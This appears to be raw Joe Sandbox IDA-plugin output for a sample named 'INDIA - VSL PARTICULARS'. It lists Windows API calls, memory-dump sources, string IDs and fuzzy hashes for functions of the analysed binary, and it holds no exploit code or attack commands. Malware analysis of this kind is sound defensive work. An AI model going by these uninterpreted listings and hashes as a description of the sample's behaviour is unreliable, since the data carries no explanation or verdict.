                              • GetFocus.USER32 ref: 0046A0DD
                              • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                              Similarity
                              • API ID: MessagePost$CtrlFocus
                              • String ID: 0
                              • API String ID: 1534620443-4108050209
                              • Opcode ID: 69f57c1da7d99aaf19a54cb3f0377e1430f34c496c45dabe130679879bb200d9
                              • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                              • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                              APIs
                              • DestroyWindow.USER32(?), ref: 004558E3
                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Window$CreateDestroy
                              • String ID: ,$tooltips_class32
                              • API String ID: 1109047481-3856767331
                              • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                              • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                              • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                              • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                              APIs
                              • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                              • GetMenuItemCount.USER32(?), ref: 00468C45
                              • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                              • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                              • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                              • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                              • GetMenuItemCount.USER32 ref: 00468CFD
                              • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                              • GetCursorPos.USER32(?), ref: 00468D3F
                              • SetForegroundWindow.USER32(?), ref: 00468D49
                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                              • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                              • String ID: 0
                              • API String ID: 1441871840-4108050209
                              • Opcode ID: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                              • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                              • Opcode Fuzzy Hash: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                              • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                              APIs
                              • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                              • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                              • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                              • __swprintf.LIBCMT ref: 00460915
                              • __swprintf.LIBCMT ref: 0046092D
                              • _wprintf.LIBCMT ref: 004609E1
                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                              • API String ID: 3631882475-2268648507
                              • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                              • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                              • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                              • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                              APIs
                              • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                              • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                              • SendMessageW.USER32 ref: 00471740
                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                              • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                              • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                              • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                              • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                              • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                              • SendMessageW.USER32 ref: 0047184F
                              • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                              • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                              • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                              • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                              • String ID:
                              • API String ID: 4116747274-0
                              • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                              • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                              • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                              • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                              APIs
                              • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                              • _wcslen.LIBCMT ref: 00461683
                              • __swprintf.LIBCMT ref: 00461721
                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                              • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                              • GetDlgCtrlID.USER32(?), ref: 00461869
                              • GetWindowRect.USER32(?,?), ref: 004618A4
                              • GetParent.USER32(?), ref: 004618C3
                              • ScreenToClient.USER32(00000000), ref: 004618CA
                              • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                              • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                              • String ID: %s%u
                              • API String ID: 1899580136-679674701
                              • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                              • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                              • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                              • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                              APIs
                              • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                              • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                              • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: InfoItemMenu$Sleep
                              • String ID: 0
                              • API String ID: 1196289194-4108050209
                              • Opcode ID: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                              • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                              • Opcode Fuzzy Hash: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                              • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                              APIs
                              • GetDC.USER32(00000000), ref: 0043143E
                              • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                              • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                              • SelectObject.GDI32(00000000,?), ref: 00431466
                              • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                              • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                              • String ID: (
                              • API String ID: 3300687185-3887548279
                              • Opcode ID: 603e6b3e37746ec9058b96d14af227772b21f97dc715e72dc47e988551ca64b1
                              • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                              • Opcode Fuzzy Hash: 603e6b3e37746ec9058b96d14af227772b21f97dc715e72dc47e988551ca64b1
                              • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                              APIs
                                • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                              • GetDriveTypeW.KERNEL32 ref: 0045DB32
                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                              • API String ID: 1976180769-4113822522
                              • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                              • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                              • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                              • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                              • String ID:
                              • API String ID: 461458858-0
                              • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                              • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                              • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                              • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                              APIs
                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                              • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                              • GlobalLock.KERNEL32(00000000), ref: 004300F6
                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                              • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                              • CloseHandle.KERNEL32(00000000), ref: 00430113
                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                              • GlobalFree.KERNEL32(00000000), ref: 00430150
                              • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                              • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                              • DeleteObject.GDI32(?), ref: 004301D0
                              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                              • String ID:
                              • API String ID: 3969911579-0
                              • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                              • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                              • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                              • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                              • String ID: 0
                              • API String ID: 956284711-4108050209
                              • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                              • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                              • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                              • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                              • String ID: 0.0.0.0
                              • API String ID: 1965227024-3771769585
                              • Opcode ID: 076f4e753302d8e1360c69636e2804f45f3b9e513b8bc5fd0a6f442411ef1df6
                              • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                              • Opcode Fuzzy Hash: 076f4e753302d8e1360c69636e2804f45f3b9e513b8bc5fd0a6f442411ef1df6
                              • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                              APIs
                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: SendString$_memmove_wcslen
                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                              • API String ID: 369157077-1007645807
                              • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                              • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                              • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                              • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                              APIs
                              • GetParent.USER32 ref: 00445BF8
                              • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                              • __wcsicoll.LIBCMT ref: 00445C33
                              • __wcsicoll.LIBCMT ref: 00445C4F
                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
